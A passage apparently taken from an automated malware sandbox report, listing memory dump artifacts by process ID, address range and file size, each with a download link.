memory/4652-288-0x00007FFA97ED0000-0x00007FFA97EE4000-memory.dmp

Filesize
80KB

Download
memory/4756-214-0x0000000000000000-mapping.dmp

Download
memory/4780-258-0x0000000000000000-mapping.dmp

Download
memory/4868-259-0x0000000000000000-mapping.dmp

Download
memory/4960-190-0x0000000000000000-mapping.dmp

Download
memory/4960-194-0x00007FFA95700000-0x00007FFA961C1000-memory.dmp

Filesize
10.8MB

Download
memory/4960-198-0x00007FFA95700000-0x00007FFA961C1000-memory.dmp

Filesize
10.8MB

Download
memory/4968-226-0x0000000000000000-mapping.dmp

Download
memory/5100-216-0x0000000000000000-mapping.dmp

Download